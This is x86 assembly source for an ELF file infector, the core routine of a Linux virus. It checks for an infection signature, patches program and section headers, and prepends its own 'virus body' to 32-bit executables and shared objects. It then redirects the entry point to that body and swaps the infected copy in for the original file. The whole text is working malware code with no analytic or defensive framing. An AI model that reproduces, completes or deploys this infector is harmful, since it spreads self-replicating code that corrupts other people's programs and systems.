PT_LOAD		equ	1
PT_DYNAMIC	equ	2
ET_EXEC		equ	2
ET_DYN		equ	3
EM_386		equ	3	
EM_486		equ	6
EV_CURRENT	equ	1
e_ident		equ	0	; 16
e_type		equ	16	; 2
e_machine	equ	18	; 2
e_version	equ	20	; 2
e_entry		equ	24	; 4
e_phoff		equ	28	; 4
e_shoff		equ	32	; 4
e_flags		equ	36	; 4
e_ehsize	equ	40	; 2
e_phentsize	equ	42	; 2
e_phnum		equ	44	; 2
e_shentsize	equ	46	; 2
e_shnum		equ	48	; 2
e_shstrndx	equ	50	; 2
p_type		equ	0	; 4
p_offset	equ	4	; 4
p_vaddr		equ	8	; 4
p_paddr		equ	12	; 4        
p_filesz	equ	16	; 4
p_memsz		equ	20	; 4
p_flags		equ	24	; 4
p_align		equ	28	; 4
sh_name		equ	0	; 4
sh_type		equ	4	; 4
sh_flags	equ	8	; 4
sh_addr		equ	12	; 4
sh_offset	equ	16	; 4
sh_size		equ	20	; 4
sh_link		equ	24	; 4
sh_info		equ	28	; 4
sh_addralign	equ	32	; 4
sh_entsize	equ	36	; 4
;------------------------------------------------------------------------------
infect_elf:
	lea	esi, [ebp+exeheader+e_type-1]
	lodsb
	cmp	al, INF_SIGNATURE
	je	bad_header
	mov	byte [esi-1], INF_SIGNATURE
	lodsw
	cmp	al, ET_EXEC
	je	.et_exec_ok
	cmp	al, ET_DYN
	jne	bad_header
.et_exec_ok:	
	lodsw
	cmp	al, EM_386
	je	.em_ok
	cmp	al, EM_486
	jne	bad_header
.em_ok:
	lodsb
	cmp	al, EV_CURRENT
	je	header_ok
bad_header:
	ret	
header_ok:

	mov	eax, dword [ebp+exeheader+e_entry]
	mov	dword [ebp+entrypoint], eax

; update phdr
	xor	edi, edi	
	
	mov	ecx, [ebp+exeheader+e_phoff]
	call	lseek_set	

	movzx	esi, word [ebp+exeheader+e_phnum]
	xor	edx, edx
	mov	dl, 32
	lea	ecx, [ebp+p_header]
	call	infect_elf_update_table
	
	or	edi, edi
	jnz	update_shdr
	ret

update_shdr:
	mov	ecx, [ebp+exeheader+e_shoff]
	call	lseek_set

	movzx	esi, word [ebp+exeheader+e_shnum]
	xor	edx, edx
	mov	dl, 40
	lea	ecx, [ebp+s_header]
	call	infect_elf_update_table
	
	add	dword [ebp+exeheader+e_shoff], edi
	add	dword [ebp+exeheader+e_phoff], edi
	
; write elf header	
	call	lseek_set_zero
	
	lea	ecx, [ebp+exeheader]
	xor	edx, edx
	mov	dl, 52
	call	sys_write

	lea	ecx, [ebp+st_buffer]
	call	sys_fstat

	mov	esi, ebx
	
        lea     ebx, [ebp+tmp_name]
	mov	dword [ebx], 00746d70h
	mov	edx, [ecx+8]			; stat_buffer->st_mode
        mov     ecx, (O_RDWR | O_CREAT)
	call	sys_open

        mov     edi, eax

; copy first 400 bytes to tmp_file
	mov	ebx, esi
	call	lseek_set_zero
	
	lea	ecx, [ebp+topofdata]
	mov	edx, 400
	call	sys_read
	
	mov	ebx, edi
	call	sys_write

; write virus body
	pusha
	call	get_addr
get_addr:
	pop	ebx
	sub	ebx, get_addr
	lea	esi, [ebx+_start]
	lea	edi, [ebp+topofdata]
	mov	ecx, virus_size
	rep	movsb
	popa
	
	mov	eax, [ebp+entrypoint]
	mov	[ebp+topofdata+(oldentry-_start)], eax

	lea	ecx, [ebp+topofdata]
	mov	edx, virus_size
	call	sys_write
	
	mov	ecx, 4096 - 400 - virus_size
	xor	edx, edx
	inc	edx

write_padding:
	push	ecx
	lea	ecx, [ebp+topofdata]
	mov	byte [ecx], 0
	call	sys_write	
	pop	ecx
	loop	write_padding

	mov	ebx, esi
	call	lseek_set_zero

	lea	ecx, [ebp+topofdata]
	xor	edx, edx
	mov	dl, 128
copy_file:	
	mov	ebx, esi
	call	sys_read
	or	eax, eax
	jz	rename
	js	rename
		
	mov	ebx, edi
	call	sys_write
	jmp	short copy_file
rename:	
	mov	ebx, edi
	call	sys_close

	push	esi
	lea	ebx, [ebp+tmp_name]
	lea	ecx, [ebp+file_name]
	call	sys_rename
	pop	ebx	

	ret

infect_elf_update_table:
	push	ecx
	push	edx
	push    edx
	call	sys_read

	cmp	dl, 32
	jne	fix_section
; fix program header
	mov	al, byte [ebp+p_header+p_type]
	cmp	al, PT_DYNAMIC
	je	fix_continue
	add	[ebp+p_header+p_offset], edi
	cmp	al, PT_LOAD
	jne	fix_continue
	mov	eax, dword [ebp+p_header+p_offset]
	or	eax, eax
	jnz	fix_continue
	mov	di, 4096
	lea	ecx, [ebp+p_header+p_vaddr]
	sub	dword [ecx], edi
	sub	dword [ecx+4], edi
	add	dword [ecx+8], edi
	add	dword [ecx+12], edi
	mov	eax, dword [ecx]
	add	eax, 400
	mov	[ebp+exeheader+e_entry], eax	
	jmp	short fix_continue
fix_section:
	add	dword [ebp+s_header+sh_offset], edi
fix_continue:
	pop	ecx
	neg	ecx
	xor	edx, edx
	inc	dx
	call	sys_lseek
	pop	edx
	pop	ecx
	call	sys_write

	dec	esi
	jz	fix_end
	jmp	short infect_elf_update_table
fix_end:ret
